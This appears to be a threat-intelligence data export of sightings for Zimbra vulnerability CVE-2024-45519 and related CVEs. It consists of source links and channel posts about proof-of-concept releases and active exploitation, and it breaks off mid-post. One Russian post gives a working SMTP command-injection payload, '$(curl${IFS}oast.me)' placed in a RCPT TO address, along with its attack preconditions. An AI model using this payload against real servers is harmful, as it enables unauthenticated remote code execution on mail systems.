{"vulnerability": "cve-2024-4551", "sightings": [{"uuid": "6955f848-6990-4afa-9f4f-9d076fcd251a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2024-10-03T21:10:01.000000Z"}, {"uuid": "f9490f66-eaa6-4ff8-b5cb-ebe58944224b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45510", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113517078055674772", "content": "", "creation_timestamp": "2024-11-20T20:05:52.434124Z"}, {"uuid": "d0e61a62-9070-4b6b-a68d-5d0a9acc4011", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45511", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113516679117523194", "content": "", "creation_timestamp": "2024-11-20T18:24:22.251998Z"}, {"uuid": "b3804bba-97d0-4b70-87aa-c83465587155", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45512", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113521813289996557", "content": "", "creation_timestamp": "2024-11-21T16:10:03.545009Z"}, {"uuid": "ca8d1422-2000-48d8-b323-e001ccf7b73f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45514", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113521813304781768", "content": "", "creation_timestamp": "2024-11-21T16:10:03.985622Z"}, {"uuid": "95b59e83-1cae-4ea7-b72c-aee5a0229b04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 
"9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45517", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113522000445292487", "content": "", "creation_timestamp": "2024-11-21T16:57:39.793370Z"}, {"uuid": "a63bcea3-3de1-4497-aa3c-af850b6f4593", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45513", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113522000411572182", "content": "", "creation_timestamp": "2024-11-21T16:57:39.727199Z"}, {"uuid": "78101531-46de-4397-a76a-551ef4b6164f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://bsky.app/profile/zttbytd.com/post/3leypimntq42j", "content": "", "creation_timestamp": "2025-01-05T13:19:39.524290Z"}, {"uuid": "2ecfe12b-51e5-4abd-90f8-18fb130ff00a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/ca550ce6-190e-460d-a052-c77cd8457862", "content": "", "creation_timestamp": "2026-02-02T12:26:27.312262Z"}, {"uuid": "6c706393-cf12-4dae-a911-8529952bca43", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45516", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lhuifazwf22h", "content": "", "creation_timestamp": "2025-02-11T01:17:32.688854Z"}, {"uuid": "455bc032-d928-4dcc-b901-e71458eb49d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45516", "type": "seen", "source": 
"https://bsky.app/profile/getpokemon7.bsky.social/post/3lhuigf3u622h", "content": "", "creation_timestamp": "2025-02-11T01:18:08.648424Z"}, {"uuid": "ec8db3a4-3686-4d73-9414-39b71fde0130", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:59.000000Z"}, {"uuid": "5d32a4dd-8b14-4fde-b22c-d90d576dc101", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "MISP/f7787455-9994-4047-b6f7-77347597c104", "content": "", "creation_timestamp": "2025-08-26T18:36:20.000000Z"}, {"uuid": "2b623d22-0e2d-4995-b3ba-9a48ea57aabc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories", "content": "", "creation_timestamp": "2025-02-17T08:58:49.232676Z"}, {"uuid": "bcff61aa-bb2d-478e-a985-979eeaaea317", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://bsky.app/profile/kriptabiz.bsky.social/post/3lkv3l2oy7u2j", "content": "", "creation_timestamp": "2025-03-21T11:16:17.147727Z"}, {"uuid": "00639f28-f672-4275-aed7-0c3be9b64f3d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8602", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-45519 
unauthenticated OS commoand Injection in Zimbra prior to 8.8.15***.\nURL\uff1ahttps://github.com/TOB1a3/CVE-2024-45519-PoC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-09-26T01:37:36.000000Z"}, {"uuid": "476c6fef-1b5f-4e47-9ff2-a95c47e8bd7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/14494", "content": "\u200aZimbra - Remote Command Execution (CVE-2024-45519)\n\nhttps://blog.projectdiscovery.io/zimbra-remote-code-execution/", "creation_timestamp": "2024-09-28T10:56:35.000000Z"}, {"uuid": "4fb9c523-f809-4f5c-b885-94b5cf01134e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45516", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/16407", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-45516\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: An issue was discovered in Zimbra Collaboration (ZCS) 9.0.0 before Patch 43, 10.0.x before 10.0.12, 10.1.x before 10.1.4, and 8.8.15 before Patch 47. A Cross-Site Scripting (XSS) vulnerability in the Zimbra Classic UI allows attackers to execute arbitrary JavaScript within the victim's session, potentially leading to unauthorized access to sensitive information. This issue arises from insufficient sanitization of HTML content, including malformed  tags with embedded JavaScript. The vulnerability is triggered when the victim views a specially crafted email in the Classic UI, causing the malicious script to execute. No further user interaction is required beyond viewing the email.\n\ud83d\udccf Published: 2025-05-14T00:00:00.000Z\n\ud83d\udccf Modified: 2025-05-14T19:46:17.900Z\n\ud83d\udd17 References:\n1. 
https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories\n2. https://wiki.zimbra.com/wiki/Security_Center\n3. https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy\n4. https://wiki.zimbra.com/wiki/Zimbra_Releases/10.1.4#Security_Fixes", "creation_timestamp": "2025-05-14T20:32:37.000000Z"}, {"uuid": "58811040-4cf4-441c-91f0-c87fe0a3217b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8680", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aZimbra - Remote Command Execution (CVE-2024-45519)\nURL\uff1ahttps://github.com/Chocapikk/CVE-2024-45519\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-10-05T00:20:30.000000Z"}, {"uuid": "f43466bd-5cce-43a1-a602-1be9cdc29943", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/ptswarm/220", "content": "\u26a0\ufe0f We've confirmed critical CVE-2024-45519 in Zimbra!\n\nSMTP-based vulnerability in postjournal service allows unauthenticated attackers to inject commands under zimbra user.\n\n\u2705 Update your software ASAP to avoid exploitation!", "creation_timestamp": "2024-09-24T15:21:20.000000Z"}, {"uuid": "d1cdb031-308e-4a5c-8212-1cabb0f8380d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/beaverdreamer/167", "content": "#zimbra #rce\n\n\u0412\u044b\u0448\u043b\u0430 \u043d\u043e\u0432\u0430\u044f CVE-2024-45519 \u043d\u0430 Zimbra Collaboration Suite &lt; 9.0.0, \u0430 \u0438\u043c\u0435\u043d\u043d\u043e \u043d\u0430 
\u0441\u0435\u0440\u0432\u0438\u0441 postjournal. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u0439 \u043a\u043e\u0434 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438\n\u0412 \u0434\u043e\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a \u0434\u0440\u0443\u0433\u0438\u043c \u043f\u043e\u0441\u0442\u0430\u043c \u0445\u043e\u0447\u0443 \u043e\u0442\u043c\u0435\u0442\u0438\u0442\u044c, \u0447\u0442\u043e \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e Zimbra \u043d\u0435 \u0431\u0443\u0434\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u0430, \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u044b\u0439 \u043c\u043e\u0434\u0443\u043b\u044c postjournal.\n\n\u041f\u0440\u0438\u043c\u0435\u0440 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438:\nEHLO localhost\nMAIL FROM: \nRCPT TO: &lt;\"aabbb$(curl${IFS}oast.me)\"@mail.domain.com&gt;\nDATA\nTest message\n.\n\n\u0422\u0430\u043a \u0436\u0435 \u0434\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c \u043e\u0434\u0438\u043d \u0438\u0437 \u0434\u0432\u0443\u0445 \u043f\u0443\u043d\u043a\u0442\u043e\u0432:\n- \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0432 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0439 \u043b\u0438\u0431\u043e \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u043d\u043e\u0439 \u0441\u0435\u0442\u0438 (\u0441\u043f\u0438\u0441\u043e\u043a mynetworks), \u043b\u0438\u0431\u043e \u0440\u0430\u0441\u0441\u0447\u0438\u0442\u044b\u0432\u0430\u0442\u044c \u0447\u0442\u043e \u043e\u043d\u0430 \u0431\u0443\u0434\u0435\u0442 
\u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u043e \u0441\u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u0430\n- \u043f\u0440\u043e\u0439\u0442\u0438 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044e.\n\n\u041f\u0443\u0431\u043b\u0438\u0447\u043d\u044b\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u044b (\u0448\u0430\u0431\u043b\u043e\u043d nuclei \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435) \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u044e\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0431\u0435\u0437 \u0430\u0443\u0442\u0445\u0430.\n\n\u0414\u0435\u0442\u0430\u043b\u0438 \u0432 \u043e\u0442\u043b\u0438\u0447\u043d\u043e\u043c \u0440\u0430\u0437\u0431\u043e\u0440\u0435 \u0432 \u0431\u043b\u043e\u0433\u0435 ProjectDiscovery.\n\n\u0421\u0441\u044b\u043b\u043a\u0438:\n- \u0420\u0430\u0437\u0431\u043e\u0440: https://blog.projectdiscovery.io/zimbra-remote-code-execution/\n- \u0428\u0430\u0431\u043b\u043e\u043d: https://github.com/projectdiscovery/nuclei-templates/pull/10860", "creation_timestamp": "2024-09-29T10:37:41.000000Z"}, {"uuid": "370bcf36-2012-4b54-8e4f-2fda7163512f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "Telegram/QxnLRuWdGgoTS9SuvQjCy4QGFdybsJKul7e0GN0IcFjceA", "content": "", "creation_timestamp": "2024-09-29T21:40:08.000000Z"}, {"uuid": "f571fbe0-d797-472a-b66f-ae5bb347e4e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/cyber_hsecurity/2598", "content": "Zimbra\n - Remote Command Execution 
(CVE-2024-45519)\n\ngithub.com/Chocapikk/CVE-2024-45519", "creation_timestamp": "2025-03-02T10:34:26.000000Z"}, {"uuid": "04311642-8f5b-45c0-be54-d4338b40a44a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/ton618cyber/4940", "content": "Researchers Sound Alarm on Active Attacks Exploiting Critical Zimbra Postjournal Flaw\n\nUrgent patching is needed for Zimbra Collaboration as attackers exploit CVE-2024-45519 to execute commands.\n\nthehackernews.com \u2022 Oct 2, 2024", "creation_timestamp": "2024-10-02T16:48:09.000000Z"}, {"uuid": "dd8a9ac2-c136-4325-8fbc-9d100a00494b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/ton618cyber/4921", "content": "#exploit\n1. CVE-2024-45519: \nZimbra SMTP RCE\nhttps://blog.projectdiscovery.io/zimbra-remote-code-execution\n]-&gt; https://github.com/p33d/CVE-2024-45519\n\n2. 
CVE-2024-41110:\nDocker AuthZ plugins Security Checker\nhttps://github.com/vvpoglazov/cve-2024-41110-checker", "creation_timestamp": "2024-10-02T16:38:48.000000Z"}, {"uuid": "84dc77dc-a0d6-4019-b2ff-30d75af95cf6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/ptswarm/224", "content": "\ud83e\udd20 A notorious RCE in Zimbra, CVE-2024-45519 \u2013 here\u2019s our expert breakdown!\n\nHigh resolution", "creation_timestamp": "2024-09-30T14:31:29.000000Z"}, {"uuid": "2c366797-e715-49f7-a2a2-a0470643cf11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/kasperskyb2b/1441", "content": "\u23e9 \u0418\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f APT \u0438 \u043d\u043e\u0432\u043e\u0441\u0442\u0438 \u0418\u0411 \u0437\u0430 \u043d\u0435\u0434\u0435\u043b\u044e\n\n\ud83e\udd2f \u041e\u0431\u044b\u0447\u043d\u043e \u043c\u044b \u0438\u0433\u043d\u043e\u0440\u0438\u0440\u0443\u0435\u043c \u043d\u043e\u0432\u043e\u0441\u0442\u0438 APT \u0431\u0435\u0437 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0438\u043d\u0434\u0438\u043a\u0430\u0442\u043e\u0440\u043e\u0432, \u043d\u043e \u0442\u0443\u0442 \u0443\u0436 \u0431\u043e\u043b\u044c\u043d\u043e \u0443\u0432\u043b\u0435\u043a\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u0441\u044e\u0436\u0435\u0442. 
WSJ \u0441\u043e\u043e\u0431\u0449\u0430\u0435\u0442, \u0447\u0442\u043e \u043f\u0440\u0438 \u0440\u0430\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0438 \u0430\u0442\u0430\u043a APT Salt Typhoon \u0432\u044b\u044f\u0441\u043d\u0438\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435 \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0430\u044e\u0442 \u043d\u0443\u0436\u043d\u044b\u0439 \u0442\u0440\u0430\u0444\u0438\u043a \u0430\u043c\u0435\u0440\u0438\u043a\u0430\u043d\u0446\u0435\u0432, \u043f\u043e\u043b\u044c\u0437\u0443\u044f\u0441\u044c \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c\u0438, \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u043c\u0438 \u0432 \u0441\u0435\u0442\u044f\u0445 AT&amp;T, Verizon \u0438 \u043f\u0440\u043e\u0447\u0438\u0445 \u0442\u0435\u043b\u0435\u043a\u043e\u043c\u043e\u0432 \u0434\u043b\u044f \u0437\u0430\u043a\u043e\u043d\u043d\u043e\u0439 \u043f\u0440\u043e\u0441\u043b\u0443\u0448\u043a\u0438 \u0430\u043c\u0435\u0440\u0438\u043a\u0430\u043d\u0441\u043a\u0438\u043c\u0438 \u0441\u043f\u0435\u0446\u0441\u043b\u0443\u0436\u0431\u0430\u043c\u0438 (\u0430\u043d\u0430\u043b\u043e\u0433 \u0421\u041e\u0420\u041c). 
\u042d\u0442\u043e \u2014 \u0445\u043e\u0440\u043e\u0448\u0435\u0435 \u043d\u0430\u043f\u043e\u043c\u0438\u043d\u0430\u043d\u0438\u0435 \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u043d\u0435\u043b\u044c\u0437\u044f \u0441\u043e\u0437\u0434\u0430\u0442\u044c \u0431\u044d\u043a\u0434\u043e\u0440 \u0434\u043b\u044f \u043a\u043e\u0433\u043e-\u0442\u043e \u043e\u0434\u043d\u043e\u0433\u043e, \u0440\u0430\u043d\u043e \u0438\u043b\u0438 \u043f\u043e\u0437\u0434\u043d\u043e \u043e\u043d \u0431\u0443\u0434\u0435\u0442 \u0434\u043b\u044f \u0432\u0441\u0435\u0445.\n\n\ud83d\udc7d SIEM \u043d\u0430 \u0441\u043b\u0443\u0436\u0431\u0435 \u0437\u043b\u043e\u0434\u0435\u0435\u0432: \u0432 \u043d\u043e\u0432\u043e\u0439 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044f \u0438 \u0441\u0431\u043e\u0440\u0430 \u0442\u0435\u043b\u0435\u043c\u0435\u0442\u0440\u0438\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043a\u043b\u0438\u0435\u043d\u0442 open source SIEM Wazuh. 
\u041a\u043e\u043d\u0435\u0447\u043d\u043e\u0439 \u0446\u0435\u043b\u044c\u044e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043c\u0430\u0439\u043d\u0438\u043d\u0433.\n\n\ud83d\ude2e Cloudflare \u043e\u0442\u0447\u0438\u0442\u0430\u043b\u0441\u044c \u043e \u0431\u043e\u0440\u044c\u0431\u0435 \u0441 \u043a\u0440\u0443\u043f\u043d\u0435\u0439\u0448\u0435\u0439 DDoS-\u0430\u0442\u0430\u043a\u043e\u0439 \u0430\u0436 \u043d\u0430 3,8 \u0422\u0431/\u0441.\n\n\ud83d\udc7e \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 \u043c\u0430\u0441\u0441\u0438\u0432\u043d\u043e\u0439 \u0441\u0435\u0442\u0438 \u0437\u0430\u0440\u0430\u0436\u0451\u043d\u043d\u044b\u0445 \u0440\u043e\u0443\u0442\u0435\u0440\u043e\u0432, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432\u044b\u0441\u0442\u0443\u043f\u0430\u044e\u0442 \u0434\u043e\u043c\u0430\u0448\u043d\u0438\u043c\u0438 \u043f\u0440\u043e\u043a\u0441\u0438 \u0438 \u043f\u0440\u043e\u043c\u0435\u0436\u0443\u0442\u043e\u0447\u043d\u044b\u043c\u0438 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u043c\u0438 \u0434\u043b\u044f \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a. \u0411\u043e\u043b\u044c\u0448\u0435 \u0432\u0441\u0435\u0433\u043e \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 \u043d\u0430\u0439\u0434\u0435\u043d\u043e \u0432 \u0421\u0428\u0410, \u0413\u043e\u043d\u043a\u043e\u043d\u0433\u0435 \u0438 \u0428\u0432\u0435\u0446\u0438\u0438, \u0441\u0430\u043c\u044b\u0435 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0435 \u0434\u0435\u0432\u0430\u0439\u0441\u044b \u0432 \u0431\u043e\u0442\u043d\u0435\u0442\u0435 \u2014 Asus \u0438 Qnap. 
\u041d\u0430 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u0445 \u043d\u0430\u0439\u0434\u0435\u043d\u044b \u043e\u0431\u0440\u0430\u0437\u0446\u044b \u0412\u041f\u041e GobRAT \u0438 Bulbature. \n\n\u0410 \u0412\u041f\u041e perfctl \u0443\u0436\u0435 \u0442\u0440\u0438 \u0433\u043e\u0434\u0430 \u043c\u0430\u0441\u0441\u043e\u0432\u043e \u0437\u0430\u0440\u0430\u0436\u0430\u0435\u0442 Linux-\u0441\u0435\u0440\u0432\u0435\u0440\u044b, \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044f 20 \u0442\u044b\u0441\u044f\u0447 \u043e\u0448\u0438\u0431\u043e\u043a \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438.  \u041f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0435 \u0412\u041f\u041e \u043c\u0430\u0441\u043a\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0440\u0443\u0442\u043a\u0438\u0442\u043e\u043c \u0438 \u0446\u0435\u043b\u044b\u043c \u043d\u0430\u0431\u043e\u0440\u043e\u043c \u0434\u0440\u0443\u0433\u0438\u0445 \u0442\u0440\u044e\u043a\u043e\u0432 \u0434\u043b\u044f \u043c\u0430\u043a\u0441\u0438\u043c\u0438\u0437\u0430\u0446\u0438\u0438 \u0441\u043a\u0440\u044b\u0442\u043d\u043e\u0441\u0442\u0438. 
\u0412 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0444\u0438\u043d\u0430\u043b\u044c\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u043e\u0431\u044b\u0447\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043c\u0430\u0439\u043d\u0435\u0440.\n\n\u0412 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438, \u0440\u0430\u043d\u0435\u0435 \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0440\u0443\u0435\u043c\u043e\u0439 APT Mustang Panda, \u043d\u0430\u0448\u0451\u043b\u0441\u044f \u043a\u043b\u0430\u0441\u0442\u0435\u0440, \u0432\u0438\u0434\u0438\u043c\u043e \u043f\u0440\u0438\u043d\u0430\u0434\u043b\u0435\u0436\u0430\u0449\u0438\u0439 \u043d\u043e\u0432\u043e\u0439 \u043f\u043e\u0434\u0433\u0440\u0443\u043f\u043f\u0435, \u043d\u0430\u0437\u0432\u0430\u043d\u043d\u043e\u0439 CeranaKeeper. \u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u044b\u0435 \u043e\u0431\u043b\u0430\u0447\u043d\u044b\u0435 \u0441\u0435\u0440\u0432\u0438\u0441\u044b \u0434\u043b\u044f \u04212 \u0438 \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438. 
\n\n\ud83d\udc6e\u200d\u2640\ufe0f\u041a\u0440\u0430\u0442\u043a\u0438\u0439 \u0440\u0430\u0437\u0431\u043e\u0440 \u043d\u043e\u0432\u044b\u0445 \u043c\u043e\u0434\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0439 \u0438 \u0430\u0442\u0430\u043a Akira ransomware: TTP, IoC, \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 \u043f\u043e \u0445\u0430\u043d\u0442\u0438\u043d\u0433\u0443.\n\n\u2328\ufe0f\u041e\u0431\u0437\u043e\u0440 \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 CyberVolk, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043d\u0430\u0447\u0438\u043d\u0430\u043b\u0430 \u0441 \u0445\u0430\u043a\u0442\u0438\u0432\u0438\u0437\u043c\u0430, \u0430 \u0432 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0435 \u0432\u0440\u0435\u043c\u044f \u0430\u043a\u0442\u0438\u0432\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043b\u0430 \u0444\u0438\u043d\u0430\u043d\u0441\u043e\u0432\u043e \u043c\u043e\u0442\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0430\u0442\u0430\u043a\u0438 ransomware.\n\n\ud83d\ude93 \u041e\u043a\u043e\u043b\u043e 5% \u0432\u0441\u0435\u0445 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442-\u043c\u0430\u0433\u0430\u0437\u0438\u043d\u043e\u0432, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0449\u0438\u0445 \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 